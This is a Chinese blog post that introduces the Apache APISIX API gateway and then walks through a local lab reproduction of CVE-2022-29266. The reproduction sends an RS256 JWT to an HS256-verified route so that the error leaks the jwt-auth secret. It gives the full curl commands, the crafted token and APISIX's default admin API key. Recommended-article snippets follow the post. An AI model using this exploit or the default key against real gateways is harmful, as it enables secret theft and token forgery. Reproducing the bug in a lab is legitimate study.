APISIX

于 2025-06-25 23:04:41 发布
阅读量968 收藏 23
点赞数 20
CC 4.0 BY-SA版权
分类专栏: 云安全 文章标签: web安全 网络安全 安全 云安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ALe0721/article/details/148908865

什么是 APISIX?

APISIX 是一个 高性能、动态、可扩展的开源 API 网关,由 Apache 基金会孵化和维护,采用 Lua + NGINX(OpenResty) 构建,适合处理高并发、低延迟的 API 请求。

它的功能就像一个“门卫”:

客户端访问后端服务前,所有请求都要先经过它检查、处理、转发。

核心功能

功能

描述

认证

支持 JWT、Key-auth、Basic Auth、LDAP 等多种认证方式

动态路由

不重启即可添加/修改路由(支持 REST 接口/Etcd 热更新)

流量控制

限流、熔断、重试、请求分发等机制

监控

Prometheus、SkyWalking、Zipkin 集成

插件机制

支持 Lua 插件热插拔,可以动态开启/关闭功能

云原生支持

支持 K8s ingress controller、服务注册发现

安全防护

IP 过滤、WAF、SSL/TLS、CORS 支持

多协议支持

HTTP、HTTPS、gRPC、WebSocket、MQTT(实验性)等

架构组件(简化)

                   ┌────────────┐
Client ──────────▶│  APISIX    │─────────▶ 后端服务(API、微服务)
                   │(插件、认证、限流等)│
                   └────────────┘
                         ▲
                         │
                  控制面:etcd
  • APISIX 作为数据面:负责实际请求处理
  • Etcd 作为配置中心:负责存储路由、插件配置等(可热更新)

性能优势

  • 超高性能:官方 benchmark 在多核机器下可达百万级 QPS(基于 OpenResty)
  • 毫秒级配置生效:更新路由/插件配置几乎是实时的
  • 插件热加载:不需要重启就可以动态修改行为

常见使用场景

  1. 微服务 API 网关(服务发现、统一入口)
  2. K8s Ingress Controller 替代方案
  3. 统一认证与鉴权
  4. 限流/熔断/降级/灰度发布
  5. 边缘计算/多云网关
  6. BFF 架构的一部分

和其他网关的对比简表:

特性

APISIX

Kong

NGINX Ingress

动态配置

✅ 强

❌(部分支持)

❌ 重启生效

插件系统

✅ 热插拔

✅ 插件多

❌ 无自定义插件

性能

✅ 高性能

中等

云原生支持

✅ 原生支持 K8s

扩展性

✅ 强(Lua)

✅(Lua)

较弱

插件机制举例(如限流)

APISIX 的插件配置可以像这样:

{
  "plugins": {
    "limit-count": {
      "count": 10,
      "time_window": 60,
      "rejected_code": 429
    }
  }
}

代表:每分钟只能访问 10 次,多了就返回 429 哦~

快速部署体验(Docker 方式)

git clone https://github.com/apache/apisix-docker.git
cd apisix-docker/example
docker-compose -p apisix up -d

访问 Admin API:

curl http://127.0.0.1:9180/apisix/admin/routes \
  -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1'

官方文档

传送门:
https://apisix.apache.org

总结:

APISIX 就是一个现代化、动态、可扩展的“超级 API 门卫”,能安全、高效地管理所有你的服务调用请求

APISIX CVE-2022-29266

在 2.13.1 之前的 Apache APISIX 中,由于 APISIX 中的 jwt-auth 插件依赖于 lua-resty-jwt 库,而在 lua-resty-jwt 库返回的错误信息中可能会包含 JWT 的 sceret 值,因此对于开启了 jwt-auth 插件的 APISIX 存在 JWT sceret 的泄露,从而造成对 JWT 的伪造风险。

在 VulnHub 上有 APISIX CVE-2020-13945 漏洞的靶场,APISIX 版本为 2.11.0,因此我们可以直接用这个靶场作为 CVE-2022-29266 的靶场进行复现。

创建一个 consumer 对象,并设置 jwt-auth 的值,默认是 HS256 算法,secret 值为 teamssix-secret-key

curl http://127.0.0.1:9080/apisix/admin/consumers -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d '
{
"username": "jack",
"plugins": {
"jwt-auth": {
"key": "rs-key",
"secret": "flag{Oh_U_find_me}"
}
}
}'

然后再创建 Route 对象,并开启 jwt-auth 插件

curl http://127.0.0.1:9080/apisix/admin/routes/1 -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d '
{
"methods": ["GET"],
"uri": "/index.html",
"plugins": {
"jwt-auth": {}
},
"upstream": {
"type": "roundrobin",
"nodes": {
"0.0.0.0:80": 1
}
}
}'

这样才算把环境搭好,secret值可以自己设置

首先需要一个 RS256 算法(RS512也可以)的 JWT 值,这里为了方便直接在 jwt.io中生成,只需要将算法改为 RS256,Payload 改为以下内容即可,注意 Payload 中的 key 值需要和创建consumer 对象时的 key 一致

生成的jwt值如下

eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJrZXkiOiJycy1rZXkifQ.mF27BBWlXPb3fTiFufhcL3K9y99b8kioMmp7eMwRhB1kZjK62aJ_R6SB0A_Kmym8a7U2S3zYLue9mkD4FGGmhwmkmUGppjZdtwfxrZc7JvvdpJbihNGxdfn9ywUspr6DX831e29VAy1DnLT6cU8do_9MFklxrRbhTVpDOsOADEhh6Q5zdTKPz3h5pKHSQYO4y5Xd0bmRM7TqRvhfIRchmvroaJBQjP6TrDrN_x2elRpPsuabYmCNH_G7m6x5ouf0bqoOkOmsk3alJ6zNZFDY6-aTS4vDD8SDlSbAXkCh5DN-C10YQ6ZYWUGmcbap7hQhaIVJRlZRtaXMFbmabLwhgg

将刚才由 RS256 算法生成的 JWT 值发送给 HS256 算法验证的路由,这样就可以获得刚才设置的 secret 值了

curl http://127.0.0.1:9080/index.html?jwt=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJrZXkiOiJycy1rZXkifQ.mF27BBWlXPb3fTiFufhcL3K9y99b8kioMmp7eMwRhB1kZjK62aJ_R6SB0A_Kmym8a7U2S3zYLue9mkD4FGGmhwmkmUGppjZdtwfxrZc7JvvdpJbihNGxdfn9ywUspr6DX831e29VAy1DnLT6cU8do_9MFklxrRbhTVpDOsOADEhh6Q5zdTKPz3h5pKHSQYO4y5Xd0bmRM7TqRvhfIRchmvroaJBQjP6TrDrN_x2elRpPsuabYmCNH_G7m6x5ouf0bqoOkOmsk3alJ6zNZFDY6-aTS4vDD8SDlSbAXkCh5DN-C10YQ6ZYWUGmcbap7hQhaIVJRlZRtaXMFbmabLwhgg -i

Apisix入门(二)』从零到一掌握Apache APISIX:架构解析与实战指南
老陈聊架构
03-26 9509
🌐 深入Apache APISIX架构: 从Nginx到OpenResty,再到etcd,一站式掌握云原生API网关的构建精髓,领略其层次化设计的魅力。 🔌 核心组件全解析: 路由、上游、服务、消费者、插件...这些不再是抽象的概念,而是你API管理中的强大工具。 🛠 路由配置实操: 通过Admin API,轻松创建上游、配置路由,实现请求的精准转发,让理论与实践完美结合。 🌟 APISIX的独特优势: 动态路由、热插拔插件、云原生兼容性...这些特性让APISIX在API网关领域独树一帜。
apisix的原理及作用,跟spring cloud gateway有什么区别?
songkai558919的博客
10-25 3420
是一个功能强大、高性能的 API 网关,主要用于微服务架构中流量管理、服务治理和安全控制。通过其强大的插件机制、动态配置、负载均衡、服务发现、日志和监控功能,APISIX 帮助开发者和运维人员更好地管理APISIX适合高性能、需要多协议支持、对扩展性和动态配置有更高要求的场景。它通过 Nginx 的强大性能、LuaJIT 的即时编译以及丰富的插件生态,在高并发、低延迟的情况下具有显著优势。
Apache APISIX快速入门
neweastsun的专栏
12-11 1634
本文将介绍Apache APISIX,这是一个开源API网关,可以处理速率限制选项,并且可以轻松地完全控制外部流量对内部后端API服务的访问。我们将看看是什么使它从其他网关服务中脱颖而出。我们还将详细讨论如何开始使用Apache APISIX网关。在深入讨论这个主题之前,让我们先讨论一下API网关。
Apache APISIX 插件开发完全指南
最新发布
gitblog_00703的博客
06-02 344
Apache APISIX 插件开发完全指南 前言 Apache APISIX 作为云原生 API 网关,其插件系统是其最强大的功能之一。本文将全面介绍如何在 APISIX 中开发自定义插件,从基础概念到高级功能,帮助开发者快速掌握插件开发的核心要点。 插件开发基础 插件放置路径 APISIX 提供了灵活的插件加载机制,开发者可以通过两种方式扩展功能: 直接修改源代码(不推荐):这种方式虽然直接...
科普文:软件架构设计之【云原生 API 网关:APISIX介绍及使用流程建议】
为无为,事无事,味无味。
08-19 1342
是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。你可以使用 Apache APISIX 来处理传统的南北向流量,以及服务间的东西向流量, 也可以当做来使用。Apache APISIX 的技术架构如下图所示:上图为 APISIX 产品中控制平⾯(简称 CP)与数据平⾯(简称 DP)的架构⽰意图,并包含了3个部分:API ⽹关 ⽤于承载并处理业务流量,管理员在配置路由规则后,⽹关将根据预设规则将请求转发⾄上游服务。
APISIX-全新一代API网关,带可视化管理,文档贼友好!
Ch3nnn的博客
04-18 1万+
apisix是一款云原生微服务API网关,可以为API提供终极性能、安全性、开源和可扩展的平台。apisix基于Nginx和etcd实现,与传统API网关相比,apisix具有动态路由和插件热加载,特别适合微服务系统下的API管理。体验了一把apisix这个全新一代的API网关,有可视化管理的网关果然不一样,简单易用,功能强大!如果你的微服务是云原生的话,可以试着用它来做网关。其实apisix并不是个小众框架,很多国内外大厂都在使用了,如果你想知道哪些公司在使用,可以参考下面的连接。
云原生 API 网关 APISIX 入门教程
easylife206的专栏
07-29 9176
公众号关注「奇妙的 Linux 世界」设为「星标」,每天带你玩转 Linux !​Apache APISIX 是 Apache 软件基金会下的云原生 API 网关,它具有动态、实时、高性能等特点,提供了负载均衡、动态上游、灰度发布(金丝雀发布)、服务熔断、限速、防御恶意攻击、身份认证、可观测性等丰富的流量管理功能。我们可以使用 Apache APISIX 来处理传统的南北向流量,也可以处理服务间...
云原生下最火的API网关-APISIX
03-03 6616
APISIX是一款基于Nginx和OpenResty的云原生API网关,由Apache APISIX社区维护。它提供了一个可扩展的、低延迟、高性能的API网关解决方案,支持常见的API管理功能,如流量控制、认证、转发、限速、缓存、日志等,并提供了灵活的插件机制,可支持自定义插件的开发和集成。
apisix及dashboard的安装包
01-22
APIsix是一个高性能、可插拔的API网关,由Apache APISIX项目孵化而来。它提供了一个动态、实时的配置更新功能,并且具备高可用和无中断升级的特点。APIsix的设计目标是为企业提供一个强大且稳定的API管理平台,支持...
apisix离线安装包及依赖
05-14
1、apisix_install.md 2、apisix-3.9.1-0.el7.x86_64.rpm 3、apisix-dashboard-2.9.0-0.el7.x86_64.rpm 4、cyrus-sasl-2.1.26-24.el7_9.x86_64.rpm 5、cyrus-sasl-devel-2.1.26-24.el7_9.x86_64.rpm 6、cyrus-sasl-...
linux系统docker离线镜像apisix-2.10.0镜像资源
10-12
apisix-2.10.0是APISIX的版本号,表示该镜像是基于APISIX版本2.10.0所构建的。当用户在Linux系统的Docker环境中部署apisix-2.10.0镜像时,可以快速获得一个稳定、高效、功能丰富的API网关,用于管理和执行API路由、...
linux系统docker离线镜像apisix-dashboard-2.9.0镜像资源
10-12
加载完成后,便可以使用Docker运行容器,执行如“docker run -d -p 9080:9080 --name apigee-dashboard apisix-dashboard:2.9.0”来启动一个后台运行的apisix-dashboard容器,并将容器内部的端口映射到宿主机的端口...
apisix-2.13.1离线安装包.zip 适用于centos7
08-30
Apache APISIX是一款高性能、轻量级的API网关,它提供了一种高效的方式来管理和路由API请求。在给定的“apisix-2.13.1离线安装包.zip”中,包含了针对CentOS 7操作系统的离线安装文件,使得用户无需联网也能进行安装...
APISIX简要叙述
учёба
12-16 1万+
1 概述 1.1 概念 APISIX 是基于 OpenResty + etcd 实现的云原生、高性能、可扩展的微服务 API 网关 OpenResty:通过 Lua 扩展 Nginx 实现的可伸缩的 Web 平台 Lua :使用C语言表现的一种轻量级可扩展脚本语言,开源 OpenResty 是一个 Web 应用服务器,Web 开发人员可以使用 Lua 脚本语言调动 Nginx 支持的各种 C 以及 Lua 模块,并且性能非常高 OpenResty 的目标是让你的 Web 服务直接跑在 Nginx 服务内
APISIXAPISIX Dashboard搭建、路由配置及插件使用
CaptainJava的博客
06-28 2万+
本文简要描述了APISIXAPISIX Dashboard的搭建 以及消费者consumer、常用插件等的使用
apisix高性能网关-中文开发文档
Z.X的博客
06-12 3346
2020年6月12日13:48:33 github:https://github.com/apache/incubator-apisix 目前此项目已有成为apache孵化项目 官方中文文档 :https://github.com/apache/incubator-apisix/blob/master/README_CN.md 支持的功能很多,我个人比较推荐服务发现,这个很省资源,不然得吧j...
APISIX简介与应用
热门推荐
坎坎坷坷
04-29 3万+
APISIX 是一个云原生、高性能、可扩展的微服务 API 开源网关,基于OpenResty(Nginx+Lua)和etcd来实现,对比传统的API网关,具有动态路由和热插件加载的特点。系统本身自带前端,可以手动配置路由、负载均衡、限速限流、身份验证等插件,操作方便。APISIX是用Lua语言开发,语言相对简单,容易上手,同时可以按自己的需求进行系统的二次开发以及开发自己的插件,目前APISIX已...
全新一代API网关,带可视化管理,文档贼友好!
Java_cola的博客
07-19 846
摘要 提到API网关,大家比较熟悉的有Spring Cloud体系中的Gateway和Zuul,这些网关在使用的时候基本都要修改配置文件或自己开发功能。今天给大家介绍一款功能强大的API网关apisix,自带可视化管理功能,多达三十种插件支持,希望对大家有所帮助! 简介 apisix是一款云原生微服务API网关,可以为API提供终极性能、安全性、开源和可扩展的平台。apisix基于Nginx和etcd实现,与传统API网关相比,apisix具有动态路由和插件热加载,特别适合微服务系统下的API管理。 核.
APISIX 极简入门(国产微服务网关)
weixin_42073629的博客
06-21 8134
1. 概述 APISIX 是基于OpenResty+etcd实现的云原生、高性能、可扩展的微服务 API 网关。它是国人开源,目前已经进入 Apache 进行孵化,牛逼!!! OpenResty:通过 Lua 扩展 Nginx 实现的可伸缩的 Web 平台。 etcd:Key/Value 存储系统。 APISIX 通过插件机制,提供了动态负载平衡、身份验证、限流限速等等功能,当然我们也可以自己开发插件进行拓展。 动态负载均衡:跨多个上游服务的动态负载均衡,目前已支持 round-r...
apisix
03-22
### 关于 Apache APISIX 的官方文档及教程 Apache APISIX 是一个高性能、可扩展的 API 网关,支持动态路由、插件热加载等功能。以下是关于其官方文档和教程的信息: #### 1. **官方文档** Apache APISIX 提供了详尽的官方文档,涵盖了从基础概念到高级功能的内容。这些文档可以帮助开发者快速上手并深入理解 APISIX 的工作原理。 - 官方文档地址:[https://apisix.apache.org/docs/](https://apisix.apache.org/docs/) [^3] - 文档内容包括但不限于: - 快速入门指南 - 配置管理说明 - 插件开发手册 - 性能调优建议 #### 2. **安装方法** APISIX 支持多种安装方式,具体取决于用户的环境需求和技术栈偏好。 - 基于 Docker 的安装是最简单的方式之一,适合初学者尝试: ```bash docker run -d --name apisix \ -p 9080:9080 \ -p 9443:9443 \ apache/apisix:latest ``` 上述命令会启动 APISIX 并将其绑定至本地端口 `9080` 和 `9443` [^4]。 - 对于生产环境,推荐使用 Helm Chart 或源码编译方式进行安装。 #### 3. **配置文件详解** APISIX 的核心配置存储在 `conf/config.yaml` 文件中。该文件定义了网关的行为参数,例如监听端口、日志级别以及上游服务设置等。 - 默认 HTTP 监听端口为 `9080`,而 Dashboard 则运行在独立的 `9000` 端口 [^2]。 - 示例配置片段如下所示: ```yaml http_port: 9080 enable_admin: true admin_key: - name: "admin" key: "edd1c9f034335f136f87ad84b625c8f1" role: "admin" ``` #### 4. **Dashboard 使用教程** Apache APISIX Dashboard 是一款图形化工具,用于简化 APISIX 的管理和监控操作。它提供了直观的操作界面来创建路由、查看统计信息等。 - 访问 URL:`http://<your-server-ip>:9000` - 登录凭证:默认用户名为 `admin`,密码也是 `admin` [^2]。 - 功能模块概述: - 路由管理:新增、编辑或删除现有路由规则。 - 插件中心:启用或禁用特定插件以增强功能。 - 数据分析:展示实时流量数据和其他性能指标。 #### 5. **社区资源与支持** 除了官方文档外,还有丰富的社区资源可供学习交流。 - GitHub 地址:[https://github.com/apache/apisix](https://github.com/apache/apisix) [^5] - 用户邮件列表:订阅后可以获取最新资讯并与全球用户互动。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值